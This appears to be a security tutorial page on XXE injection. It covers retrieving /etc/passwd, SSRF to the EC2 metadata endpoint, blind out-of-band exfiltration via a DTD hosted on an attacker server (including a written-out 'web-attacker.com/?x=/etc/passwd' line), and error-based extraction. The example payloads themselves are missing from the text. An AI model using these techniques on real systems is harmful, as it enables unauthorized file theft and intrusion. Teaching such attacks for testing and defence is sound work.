XXE
XML
XML is a file format for storing and transmitting data. It’s a language that’s used to describe data. Data stored in XML is known as being “self-defining.” This means that the structure of the data is embedded within the data itself. XML is widely used by web applications and apis for transferring data between each other. XML uses a tree like structure of tags and data.XML entity attack is a web application vulnerability that allows an attacker to interfere with an application's processing of XML data.
XML Entities
Entities are like variables in other programming languages. Below &myName; is entity wheares <!Entity myName "Alex Dhital"> is a declaration of this entity.
DocType (DTD)
Inside the DOCTYPE Declaration, we can declare what kind XML document it is depending on the data we wish to store, and in that DOCTYPE declaration is where we declare our entities. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.
XML External Entities
Xml external entities are custom entities whose defination is located outside of the DTD where they are declared. The declaration of an external entity uses the SYSTEM keyword and must specify a URL from which the value of the entity should be loaded. For example:
The URL can use the file:// protocol, and so external entities can be loaded from file. For example:
XXE to Retrive Files From the Server
Here we are creating a doctype element inside which we declare an external entity xxe whose value is "file:///etc/passwd" after this the xxe variable is referenced inside which causes the application's response to include the contents of the file.
Note: In real world we do need to test each tag in which the data might return.
XXE to perform ssrf attacks
Here we are declaring doctype foo which holds entity variable named xxe whose value is metadata endpoint of aws ec2 and this variable is referenced in data nodes below.
XXE via filtered xml entities
Sometimes the xml parsers are hardened or regular entities such as &variable; are blocked in such cases we can % symbol to both declare an entity and reference it within the DTD itself. Below we are declaring an entity xxe with % symbol then referencing it within the dtd itself.
Blind XXE vulnerabilities
Blind xxe vulnerabilities occur when the application is vulnerable to xxe injection but does not return the values of any defined external entities within its response. THis means retrival of server side files is not possible directly. There are generally two ways of exploiting blind xxe vulnerabilities
Triggering out of band network interactions, sometimes exfiltrating sensative data within the interaction data.
Causing xml parsing errors in such a way that the error messages contain sensative data.
Blind XXE to exfiltrate data out of band
Here an attacker hosts a malicious DTD on their server and causes the web application to invoke this malicious DTD which contains reference to sensative file and send this DTD again to the attacker via a query parameter.
Malicious DTD hosted on attacker's server
Here the file entity contains reference to /etc/passwd
The eval entity contains reference to another entity named exfiltrate whose value is http://web-attacker.com/?x=/etc/passwd
The eval and exfiltrate entities are called
XXE payload to vulnerable application
Data Flow
The vulnerable application will request and parse malicious.dtd from attacker's server
The value of file entity will be set to /etc/passwd file of vulnerable-server then eval and exfiltrate entities will be called in sequence
When eval entity will be called it will will set value of exfiltrate entity to
exfiltrate=http://web-attacker.com/?x=/etc/passwdThen exfiltrate entity will get called and passwd file will be appended to get request of x variable in attacker's server.
Exploiting blind xxe to retrieve data via error messages
Host a malicious dtd on attacker's server
On vulnerable application
Blind XXE where OOB interaction is blocked
According to xml specification creating an entity inside another entity is permitted only in external dtd. So what can we do in cases where blind XXE exists but out of band network interaction is disabled? In this situation it might be possible to trigger error messages containing sensative data due to a loophole in XML language specification. ***If a document's DTD uses both internal and external DTD declarations, then the internal DTD can define entities that are declared in the external DTD. *** When this happens, the restriction on using an XML parameter entity within the definition of another parameter entity is possible. This attack involves invoking a DTD file that happens to exist on the local filesystem and repurposing it to redefine an existing entity in a way that triggers a parsing error containing sensitive data.
For example, suppose there is a DTD file on the server filesystem at the location /usr/local/app/schema.dtd, and this DTD file defines an entity called custom_entity. An attacker can trigger an XML parsing error message containing the contents of the /etc/passwd file by submitting a hybrid DTD like the following:
Defines an xml entity named local_dtd schema.dtd which also exists on the vulnerable server.
Redefine xml parameter entity called called custom_entity which is defined on schema.dtd file. (Note: This line contains an error)
Define xml entity named file whose value is /etc/passwd
Define another entity eval inside which contains another entity named error whose value is /nonexistingfile/etc/passwd
Uses the local_dtd entity, so that the external DTD is interpreted, including the redefined value of the custom_entity entity. This results in the desired error message.
Locating existing dtd to repurpose
Since the application returns any error messages thrown by the xml parser, we can easily enumerate local DTD files just by attempting to load them from within the internal DTD. For example, Linux systems using the GNOME desktop environment often have a DTD file at /usr/share/yelp/dtd/docbookx.dtd. You can test whether this file is present by submitting the following XXE payload, which will cause an error if the file is missing:
After you have tested a list of common DTD files to locate a file that is present, you then need to obtain a copy of the file and review it to find an entity that you can redefine. Since many common systems that include DTD files are open source, you can normally quickly obtain a copy of files through internet search.
Areas where XXE injection arises
In SOAP requests.
Maybe try changing request method from json or application-x-www-urlencoded to xml?
Are you able to upload XML documents?
XXE via xlsx can also occur
Maybe the application takes data via application/www-urlencoded and later parses this data via backend SOAP request in such case use Xinclude attacks like
Does the application parse DOCX documents?
Image files like svg also uses xml
Last updated